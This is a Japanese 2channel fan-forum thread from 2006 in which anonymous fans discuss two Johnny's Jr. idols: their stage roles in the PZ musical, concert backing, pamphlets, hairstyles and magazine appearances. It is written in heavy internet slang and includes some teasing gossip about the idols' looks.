209 :ユーが名無しネ:2006/05/07(日) 23:27:10
早めに順番が回ってくるといいね
なんなら2人一緒でも

210 :ユーが名無しネ:2006/05/07(日) 23:54:20
通常記事で載ってる麺はインタブー済みだろうから最短でも4ヵ月後だろな

211 :ユーが名無しネ:2006/05/08(月) 00:09:10
城組も対談とかやって欲しかったな

212 :ユーが名無しネ:2006/05/08(月) 00:12:40
>210
コーナーって普通は毎月撮るんじゃないか?
雑誌レギュラーであること前提だけど


213 :ユーが名無しネ:2006/05/08(月) 00:35:09
自分も>212と同じ意見だ
来月は意外とTJとかショタあたりが来そう

214 :ユーが名無しネ:2006/05/08(月) 00:37:02
上げちまったスマソ

215 :ユーが名無しネ:2006/05/08(月) 00:41:56
>211
対談してほしかったな
窓の楽屋の過ごし方に誰も触れてなかっただけに木になる木

216 :ユーが名無しネ:2006/05/08(月) 00:44:07
神秘のベールに包まれ杉

217 :ユーが名無しネ:2006/05/08(月) 10:32:29
衝撃組の対談は衝撃が終わってからだから
城組もこれからやってくれるといいんだが

218 :ユーが名無しネ:2006/05/08(月) 11:01:36
あまり期待しない方が
舞台での扱い自体違うし

219 :ユーが名無しネ:2006/05/08(月) 14:05:35
オマイ空気嫁よ

220 :ユーが名無しネ:2006/05/08(月) 23:59:23
【怒】スレ住民【泣】

221 :ユーが名無しネ:2006/05/09(火) 10:59:09
>220
つ座布団十枚

222 :ユーが名無しネ:2006/05/09(火) 12:56:28
次はカツンドームだ
環八はつかないよな

223 :ユーが名無しネ:2006/05/09(火) 13:15:59
環八は海老足だと思う

224 :ユーが名無しネ:2006/05/09(火) 14:39:15
紺ドーム付くよな?
ステ構成変わったのが不安なんだが

225 :ユーが名無しネ:2006/05/09(火) 14:42:42
付くと思ってチケ押さえてあるんだが

226 :ユーが名無しネ:2006/05/09(火) 15:46:19
ステ違くても広いから暇なズニアワラワラつけるんじゃないだろうか
窓14人全員見るの久々だよな

227 :ユーが名無しネ:2006/05/09(火) 18:35:51
14人全員はいないと予想

228 :ユーが名無しネ:2006/05/09(火) 18:49:49
久しぶりに14人揃った所も見たいんだが

229 :ユーが名無しネ:2006/05/09(火) 21:56:15
それをここで言われても

230 :ユーが名無しネ:2006/05/09(火) 22:03:21
窓全員暇だからいるだろ

231 :ユーが名無しネ:2006/05/09(火) 22:18:56
窓の話がしたいなら窓スレですればいいとオモ
ここはあくまでもどこまでもKTスレ

232 :ユーが名無しネ:2006/05/09(火) 23:50:32
2人の髪型が間違ってませんように

233 :ユーが名無しネ:2006/05/09(火) 23:53:21
チャン髪色はどうなってるんだろう
黒も似合ってたけど

234 :ユーが名無しネ:2006/05/09(火) 23:59:11
自分はキンパチャンもスチ
ウナは黒髪キボン

235 :ユーが名無しネ:2006/05/10(水) 00:47:48
自分は二人とも黒髪キボン
特にウナは差鞠時くらい黒くてストレートがイイ

236 :ユーが名無しネ:2006/05/10(水) 01:46:01
チャンはもう天パに戻せばいいと思うの

237 :ユーが名無しネ:2006/05/10(水) 02:22:49
チャンの髪が七色になってた悪夢を見た事がある

238 :ユーが名無しネ:2006/05/10(水) 07:48:47
ちょそれコワス(w
メッシュは1色でおながい

239 :ユーが名無しネ:2006/05/10(水) 12:52:33
それはそれで見てみたい希がするのは自分だけか

240 :ユーが名無しネ:2006/05/10(水) 12:53:44
チャンならやりかねない所がコワス

241 :ユーが名無しネ:2006/05/10(水) 12:59:15
不思議の国のチャン

242 :ユーが名無しネ:2006/05/11(木) 12:07:03
明日タモステあらちだけど勿論バックはつかないよな

243 :ユーが名無しネ:2006/05/13(土) 13:39:36
今日いればいーなー

244 :ユーが名無しネ:2006/05/13(土) 14:21:55
居るといいねー
行けないけど祈っとくナモナモ

245 :ユーが名無しネ:2006/05/13(土) 16:13:34
自分もナモナモ

246 :ユーが名無しネ:2006/05/13(土) 21:54:13
居ませんでした

247 :ユーが名無しネ:2006/05/13(土) 21:55:24
まあ予想はしてたけどな
ご苦労様です

248 :ユーが名無しネ:2006/05/13(土) 22:08:23
蟻Bセンターにチャンウチワあったが始まって暫くして
いないと分かったら綺麗に梱包して仕舞ってた

249 :ユーが名無しネ:2006/05/13(土) 23:30:57
カツン横蟻と同じメンツだけだったな

250 :ユーが名無しネ:2006/05/15(月) 00:45:58
久々にJサポヒッパレ見た
チャンソロ輝いてたよチャン

251 :ユーが名無しネ:2006/05/15(月) 17:03:00
ウナチャンと衝撃組がプレゾンだね…
1回見に行く予定だったけど増やさなきゃ

252 :ユーが名無しネ:2006/05/15(月) 18:41:07
オマイ臭うぞ

253 :ユーが名無しネ:2006/05/15(月) 20:29:55
臭った?スマソ
あらちに付かないのがショックすぎで
それを隠そうとしたら自分でも胡散臭いレスになったなと思った
舞台続きなんて単価が高くてイヤだし
あらち新曲のフリがキャワスだから紺で踊るのを楽しみにしてたのにorz

254 :ユーが名無しネ:2006/05/15(月) 20:33:23
そのレスも臭う
半年ロムったら?

255 :ユーが名無しネ:2006/05/15(月) 21:40:39
自分には
一連が自演くさくにほひますがね

256 :ユーが名無しネ:2006/05/15(月) 21:45:03
舞台wktkなのは自分だけですか
座りっぱなし楽でいいジャン

257 :ユーが名無しネ:2006/05/15(月) 21:55:56
出る出る詐欺だったらと思うと怖いな

258 :ユーが名無しネ:2006/05/15(月) 22:01:14
(((( ;゚Д゚)))ガクガクブルブル

259 :ユーが名無しネ:2006/05/15(月) 22:30:58
ウナチャンの名前表記
間違ってなかった事に感動した

260 :ユーが名無しネ:2006/05/15(月) 22:32:07
自分も
チャンの朗を確認してしまった

261 :ユーが名無しネ:2006/05/15(月) 22:36:47
衝撃組は予想してたがウナチャンまで来るとはな
あらち新曲振りモエスだたのに

262 :ユーが名無しネ:2006/05/15(月) 22:36:54
気が早いけど
PZならDVD出るよね…ナモナモ

263 :ユーが名無しネ:2006/05/15(月) 23:56:30
とりあえずウナチャンが一緒で良かった

264 :ユーが名無しネ:2006/05/16(火) 00:04:20
去年みたいに
WSで赤絨毯の縁を歩くウナチャンの見切れが見れるんだろうか

265 :ユーが名無しネ:2006/05/16(火) 00:10:47
PZのパンフって買ったことないんだけど
衝撃や城みたいに稽古風景の写真載ってるのかな?
ウナチャンが稽古写真に載りますように

266 :ユーが名無しネ:2006/05/16(火) 00:25:02
パンフは期待出来ないと思うよ
城パンフでの扱いが奇跡だった位に思ってた方が

267 :ユーが名無しネ:2006/05/16(火) 00:33:34
>266
d
買うけど期待しないでおくよ

268 :ユーが名無しネ:2006/05/16(火) 01:36:12
>265
PZのパンフは例年2種(前期後期)出る
前期分には稽古風景後期分には本番写真
毎年ズニアも必ず見開きで載るから出る出るでなければウナチャンも載る
鯛ヲバの自分が長文スマソ
ちなみに3k

269 :ユーが名無しネ:2006/05/16(火) 01:48:28
去年は一種しか出なかったし稽古写真もズニアは載らなかった訳だが

270 :ユーが名無しネ:2006/05/16(火) 01:57:54
見本見ればよい

271 :ユーが名無しネ:2006/05/16(火) 02:10:07
稽古風景はズニア写ってたよ
去年の足みたいに直前からリハ入るんじゃなければ写る可能性もあるとオモ

272 :ユーが名無しネ:2006/05/16(火) 02:15:07
いざ決まってみるとwktkな自分
まだイパーン受け付けてることに驚いたが

273 :ユーが名無しネ:2006/05/16(火) 09:48:43
出番的には去年の足くらいかな
海老氏もいるし期待しない方がいいよな

274 :ユーが名無しネ:2006/05/16(火) 10:38:53
去年の足はあまり参考にならない気が

275 :ユーが名無しネ:2006/05/16(火) 11:02:00
今の状況だからこそ参考になると思うが

276 :ユーが名無しネ:2006/05/16(火) 13:08:59
去年の足は魔海老氏よりずっと後に発表されたから
今のウナチャンとは状況が違うでしょ
稽古最初から出られるから踊る場面は演舞城よりも多いことを期待してしまう

277 :ユーが名無しネ:2006/05/16(火) 14:37:50
去年足って海老氏よりも早く発表されたよね?

278 :ユーが名無しネ:2006/05/16(火) 14:48:06
>276
テキトー書くな
一般発売直前に発表されたのが足
一般発売後に発表されたのが海老氏

279 :ユーが名無しネ:2006/05/16(火) 14:54:52
>278
そうだったよな
海老氏ヲタが慌ててチケ押さえてたの思い出した

280 :ユーが名無しネ:2006/05/16(火) 15:42:08
大事なのは稽古に最初から出られるかではなく
最初から出して貰えるかなんだよな

281 :ユーが名無しネ:2006/05/16(火) 15:52:35
268姐さんd!
って誰も言ってないからなんとなく言っとくジャン!

282 :ユーが名無しネ:2006/05/16(火) 16:13:10
このまま魔が出ないなら去年の足よりはウマーなんじゃ?

283 :ユーが名無しネ:2006/05/16(火) 16:25:12
去年はサマリとカケモもあったし
今回もきっと幕開くまでいろいろあるだろうけど
とりあえず仕事あってヨカタ
身体に気をつけてがんがれ

284 :ユーが名無しネ:2006/05/16(火) 16:43:31
魔ってたしか自分たちの舞台の楽で発表するんじゃなかった?

285 :ユーが名無しネ:2006/05/16(火) 18:05:53
>278
スマソ自分すごい勘違いしてた
一生ロムりますね

286 :ユーが名無しネ:2006/05/17(水) 01:24:00
>284
魔は出ないでFAかと

287 :ユーが名無しネ:2006/05/17(水) 08:36:55
>286
ソースは?
別仕事決まってるっけ?

288 :ユーが名無しネ:2006/05/17(水) 11:01:46
【期待】スレ住人【不安】
【疑心】スレ住人【暗鬼】
【右往】スレ住人【左往】

289 :ユーが名無しネ:2006/05/17(水) 20:17:07
PZチケ高すぎて欝
終わってからあらち合流しそうな気もするし
環八帝都はつかないよな?

290 :ユーが名無しネ:2006/05/18(木) 07:35:29
PZまでは他仕事無いんじゃ?

291 :ユーが名無しネ:2006/05/18(木) 10:38:50
PZまでずっと
つくよな?つくよね?スレになる
に2947万ウナチャン

292 :ユーが名無しネ:2006/05/18(木) 22:07:28
立見で12kは凄いな

293 :ユーが名無しネ:2006/05/21(日) 02:39:57
アンダルシアに居たら夕食ジューシー唐揚げ
居なかったら鷄ガラスープ

294 :ユーが名無しネ:2006/05/21(日) 04:28:31
【騙された方はこれに沿って書き込んでください。】
       |
       |
   ぱくっ|
     /V\
    /◎;;;,;,,,,ヽ   そんなエサで
 _ ム::::(,,゚Д゚)::|   俺様が釣られると思ってんのか!!
ヽツ.(ノ:::::::::.:::::::.:..|)     【From】板
  ヾソ:::::::::::::::::.:ノ      【2ch歴】年
   ` ー U'"U'
            【釣られた回数】回
          【釣られた時の餌】



295 :ユーが名無しネ:2006/05/21(日) 19:20:00
KT途中までツートップキタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・* !!!!!

296 :ユーが名無しネ:2006/05/21(日) 19:33:03
アンダル出だしから緊張しながら見たよ
オフショのチャンのアップがウマー
ウナスレタイ通り【怒】になっちゃったのか

297 :ユーが名無しネ:2006/05/21(日) 19:56:33
ウナはどこへ行っちゃったんだろ(w

298 :ユーが名無しネ:2006/05/21(日) 21:17:20
今日のウナはどちらかといえば【泣】なんじゃ

299 :ユーが名無しネ:2006/05/21(日) 21:38:02
床を叩くほど悔しがるってのが【怒】なのかと

300 :ユーが名無しネ:2006/05/21(日) 22:51:40
収録日いつか知らないが
【怒】→【泣】→【笑】→【怒】→【泣】のリピ
チャンは【…】か【菩薩】かと

301 :ユーが名無しネ:2006/05/22(月) 01:12:58
自分は
ウナにボコボコにされた床が気になる(w

302 :ユーが名無しネ:2006/05/28(日) 14:09:28
鯛シングル出すんだな
バック付くような曲なのかな

303 :ユーが名無しネ:2006/06/02(金) 23:11:21
仕事なすぎあげ

304 :ユーが名無しネ:2006/06/02(金) 23:16:15
仕事な
すぎ?
杉さま?

305 :ユーが名無しネ:2006/06/03(土) 18:04:41
チャン様
ウナ様

306 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/05(月) 00:21:30
つ紺DVDのあれはマジネタなら十六夜ナシか_| ̄|○

307 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/05(月) 10:52:34
予想はしてたが大人の事情

308 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/05(月) 11:35:12
つも一部入れられない曲があるかもと言ってたよね
どんな事情なんだ?

309 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/05(月) 11:39:20
人の曲だからじゃないか?
レーベル違いとか

310 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/05(月) 16:27:46
そうか

311 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/05(月) 17:42:42
オマイ妙に素直でワロス

312 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/05(月) 22:32:51
公式でるまで安心デキナス
でも武威紺DVD他人の曲入ってるのあるよな

313 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/05(月) 22:36:11
他のユニ紺でも他人の曲が入ってるよな
もしかしたら他の理由?

314 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/06(火) 00:31:20
最終的にはレーベルとか会社の違いでそ

315 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/06(火) 09:16:39
DVDに入るのは最終日なのかな
チャンの涙と「d('<_`<)キレテナイッスヨ」クルー?

316 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/06(火) 17:53:27
チャンのキレテナイデスヨ興奮しすぎて記憶あいまいだから
入っててホスィ

317 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/07(水) 16:51:53
チャン、D誌
かわゆす

318 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/07(水) 17:33:06
ちょおまウナは

319 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/07(水) 17:37:45
ウナ8sも痩せたのか
じゃあ痩せる前は

320 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/07(水) 18:39:48
言わないで〜言わないで〜

321 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/07(水) 19:46:36
アイプチは間違いだよ〜

322 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/08(木) 00:33:33
私服がボミョンな同士〜

323 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/08(木) 00:36:26
こんな日もあ〜る〜よ〜

324 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/08(木) 05:28:38


325 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/08(木) 08:33:02
何気なく〜痩せすぎで〜

326 :ユーが名無しネ:2006/06/08(木) 10:26:37
何気なく〜二重すぎて〜

327 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/08(木) 11:40:50
ワロス

328 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/08(木) 14:51:20
pgr

329 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/08(木) 22:50:19
pgrそうな事ばかり集めてしまうよ〜

330 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/09(金) 08:39:54
ウナ8`痩せて二重になったって無理ある(w

331 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/09(金) 11:33:21
うん

332 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/10(土) 00:16:09
窓の窓って何の順なんだろ

333 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/10(土) 17:00:52
仮面のマイク持ち順とか?

334 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/11(日) 00:43:19
二重の手術って何日くらいかかるんだろうか

335 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/11(日) 13:46:40
30分位だとオモ

336 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/14(水) 10:57:47
27分の足紺見てる間にほぼ終わってるのか
早いな

337 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/14(水) 14:59:35
今そんなのか?
でも手術後1日は目がはれちゃうから外出出来る状態じゃないよな

338 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/15(木) 01:14:43
売れっ子じゃなくて良かったねウナ
二重デブ後チャンに会ってもチャンはそのことに気が付かなそう(w

339 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/15(木) 15:06:20
きっと
近視が進んだか乱視になったかなウナが二重に見える…ゴホッ
ぐらいで終わってそう

340 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/15(木) 20:53:34
鈍感なチャンモヘ

341 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/23(金) 11:37:13
ズニア紺決定か
ウナチャンは出ないよなorz

342 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/23(金) 23:58:13
PZ終わった後はズニア紺よりあらち紺に出て欲しい

343 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/24(土) 01:51:30
※重要※
『Jr板・裏Jr板の住み分けに関する投票のお知らせ』

3ユニ(NEWS・関ジャニ∞・KAT-TUN)関連スレを現Jr板へ
それ以外のジュニアスレを現裏Jr.板へ移動して
住み分けするか否かの投票を6月30日(金)に行います

Jr.板の自治を考えるスレッド【23】
http://tv7.2ch.net/test/read.cgi/jr/1149947336/


344 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/24(土) 23:36:25
>342
禿同
というかあらちか何も無いかの二択だとオモ

345 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/25(日) 17:46:08
※重要※
『ウナムアイプチに関する投票のお知らせ』

ウナムのアイプチについてオゲか否かの投票を7月09日(日)午後六時半より行います
場所:青山劇場
投票方法:オゲの場合は起立・否の場合は着席
うちわ・ボード・ペンラ持ち込みによる投票は禁止です
※同様にチャンコレホスト髪型についてオゲか否かの投票も行います

346 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/25(日) 22:20:04
7/9青劇に行けない自分はどうすればいいのだ?
アラチコンで起立しておくか。

347 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/25(日) 23:38:38
夏が終わるまでロムっとけ

348 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/26(月) 20:25:20
不在者投票は蟻か? 自分は否だ

349 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/26(月) 22:18:55
アツヒロのPZサイトにウナチャンも回ってくるといいな

350 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/27(火) 01:38:56
アツ兄サイトの事すっかり忘れてた

351 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/29(木) 00:42:58
あの感じだと終演までに一度は回してくれるかもな
読むの怖い気もするけど(w
とりあえずアツ兄に感謝

352 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/29(木) 02:40:30
アツ兄のQ&A
Q16に驚愕

353 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/29(木) 03:19:17
きっかけはKT

354 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/29(木) 12:35:31
すごいなウナチャン

355 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 00:27:55
次はつ紺なのか
あらちに出ないのはチト残念だな

356 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 00:29:03
あらちあらちってバカの一つ覚えみたいに

357 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 00:33:13
すっくんの一つ覚えktkt

358 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 00:39:22
あらち厨は少し空気読んでくださいね


359 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 01:28:39
k ウナ
i ゆにら
t チャン
y ゑ




…だったらいいな

360 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 01:39:33
位置厨もチョト

361 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 10:31:05
厨厨厨厨うるさい厨がいますね

362 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 22:06:20
それなら位置フカーツすればいい
ウナはミヒィ美女と一緒で

363 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 22:34:52
(‘∀‘*) スレチジャン!空気嫁ジャン!

364 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/02(日) 00:53:57
アツサイトのPZ雑記帳にチャンがキタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・* !!!!!
チャンも(笑)使ってたワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・* !!!!!

365 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/02(日) 01:18:13
チャンのマネしてこれから顔文字使うワァ*・゜゚・*:.。..。.:*・゜m(__)m゚・*:.。. .。.:*・゜゚・*

366 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/02(日) 02:27:44
チャンスレでやれよ

367 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/02(日) 11:18:46
変なのktkr

368 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/02(日) 17:31:30
チャンメッセそつないな
次はウナ?

369 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/02(日) 21:46:13
つのチャンイメージとアツヒロのチャンイメージがなんとなく似てる件

370 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/02(日) 23:21:03
チャンの無難な文章読んで自分は何て書こうかと悩んでそうだなウナ

371 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/03(月) 00:44:45
何て書けばいいか周りに聞きまくってそう
テンパって5回くらいアツ兄への送信に失敗してそう

372 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/03(月) 00:51:06
で、PZ後はあらちに一切付かないのかな

373 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/03(月) 01:10:33
つ紺についた方がウマーだし

374 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/03(月) 01:35:59
ここに晒したら週末着る物がなくなるだよ

375 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/03(月) 08:41:03
ウナ文章でも空回りするんだろうか(w

376 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/03(月) 08:53:34
武内空気読めねぇな、ここはオレが盛り上げないと…!とか
変な勘違いしてスベった文章書きそうだな(w

377 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/03(月) 11:49:32
受けようと思って絵文字多用しそうだな
【絵文字】KT【顔文字】になりそう(w

378 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/04(火) 00:51:07
そうですかね
そうは思えないのは愛ですかね

379 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/04(火) 11:29:05
オモシロネタにマジレス

380 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/05(水) 00:16:45
次スレは【…】KT【笑】になりそうだね


381 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/05(水) 00:24:42
ついにウナktkr
なげーよ(w

382 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/05(水) 00:26:58
ウナ長文だな(w
自分は【どーもー】KT【笑】

383 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/05(水) 01:37:24
意外にまともだったな
長いのがウナらしいけど(w

384 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/05(水) 03:25:13
サントラ1曲目に窓表記
ウナチャンソロパート












あったりして

385 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/05(水) 12:05:53
ウナ丁寧なのにアフォっぽいな
長文ワロス
PZパンフって毎年に2冊出るよな?
今回も2回なんだろうか?

386 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/05(水) 13:17:02
去年出なかったし出ないんじゃないか?

387 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/05(水) 20:20:07
>386
それならいいんだが
自分1回しか入らないからパンフのためだけにもう1回行くのマンドイしな

388 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/06(木) 00:17:01
ウナのコメント一昔前の漫才みたいだな(w

389 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/06(木) 23:57:10
パンフのウナチャンまともだといいな

390 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/07(金) 00:24:10
二人ともキャワでありますように(人∀・)

391 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/07(金) 01:45:10
さりげなくCDデブオメ!!

392 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/08(土) 11:10:17
3誌キャワだけど2人ともピ…いやふくよかになった?


393 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/08(土) 11:55:46
ウナの髪型ボミョン

394 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/08(土) 12:50:08
PZでもたまにあの髪型の日があったりして
刺激的だな

395 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/08(土) 19:35:04
刺激的で胃に悪いな

396 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/10(月) 00:10:43
今日初日だよな?

397 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/10(月) 00:26:10
見てきたノシ
セリフ皆無だが出番多くてびっくりした

398 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/10(月) 00:27:04
ウナチャンの髪型についてkwsk

399 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/10(月) 00:30:40
>398
チャンは相変わらず爆発してる感じでウナはパーマ
ウナのパーマは雑誌よりは落ち着いている感じ
チャンがセンター率高かった

400 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/10(月) 00:32:23
>399
d…orz

401 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/11(火) 05:35:20
パンフ1がリハのオフショット中心でウナチャンテラキャワ
チャンセンター率が高いとは思わなかったけど古紙とツートプの曲は
DVD化した時ウマーっぽい


402 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/11(火) 18:53:16
WSチャンがたくさん映ってたよな?

403 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/11(火) 21:48:55
>401
パンフ1って今年は2が出るのか?
ここ数年出てないが通販案内の紙でも配ってた?

404 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/11(火) 22:07:59
WS忘れてたorz

405 :sage:2006/07/11(火) 22:42:55
>403
パンフ2出ます
舞台ショット中心

406 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/11(火) 22:42:59
>404
明日の朝の方がたくさんあるはずだからそう気を落とさずに

407 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/11(火) 23:30:02
>402
自分見たのは夕方の日テレだけだけど
チャンの顔がはっきりわかるくらい映りこんでたのが二回ほどあったとオモ

408 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/12(水) 00:33:16
>403
パンフ1にパンフ2の通販案内のチラシが入ってたよ
パンフ2は7月末日発売予定で2k

409 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/13(木) 08:31:05
WSは当日夜分が一番ウマー?

410 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/13(木) 19:23:46
ウナチャンと軽やかに楽しげに踊るダンサータンに女疾女石(w

411 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/14(金) 12:34:00
着うたキタ━━━━(゚∀゚)━━━━!!

412 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/14(金) 12:47:16
ズニア曲も着メロあるなんてウレシス(*´∀`)
ズニア枠でお知らせこないから鯛とA2だけかと思ってた

413 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/14(金) 21:18:59
つ紺DVD十六夜入るんだな(*´∀`)

414 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 01:11:26
>410
禿同
妬いた

415 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 02:12:29
>414
ちゃんと身長差あるようにペアになって
ウナチャンが引き立つようになってるしな(w
あのダンスを長時間一緒に練習してたのか( *´∀`)

416 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 02:35:54
4行目でさらに女疾女石(w

417 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 02:44:04
ダンサーのウエスト持ってでリフトしたり
くるっと一回転させたり信頼してるラブラブカポーぶりに女疾女石(w

418 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 02:45:44
age

419 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 03:24:34
頭を撫でる振りにヤキモキ

420 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 12:47:37
自分絡みのシーンウナしか見てないが
たまたま目に入ったアフォモとまーたんがすごいデレデレしてた
ウナはたまにしか笑顔見せないがウナがデレデレしてたらもっと妬くこと間違いナシ

421 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 13:05:22
きも

422 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 14:53:35
ヤシラがオナゴと手繋げる事なんて滅多にないんだから大目にみてやれ
>421
オマエも此処が回る事なんて滅多にないんだから大目にみてやれ(w

423 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 15:29:58
ウナは結構アッサリ
チャンはすごいぞ
あまぁ―――――――い感じだ(w

424 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 16:14:08
チャンがかなりあまーーーい(wので、その後の展開で
チャンとペアのダンサータソが出てくる度に気になっていたよ
かなり年上だったから女疾女石とまではならなかったな

425 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 19:59:35
パンフの1ページ目の海老氏窓メンが椅子でくつろいでる後ろで
ピースするウナワロス

426 :sage:2006/07/16(日) 23:16:43
>425
ホントだ!


427 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/16(日) 23:24:05
回ってるからってなんでもありはだめだよ

428 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/17(月) 00:54:36
今日チャソのサスペンダーがずり落ちて相手のダンサータソが直してあげてた
その後アリガトと言ったのかどうか分らなかったが微笑みあってた
禿あまーーーーかった(w

429 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/17(月) 00:57:37
↑スレチだったorzスマソ

430 :. :2006/07/18(火) 21:39:50



431 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/19(水) 21:24:29
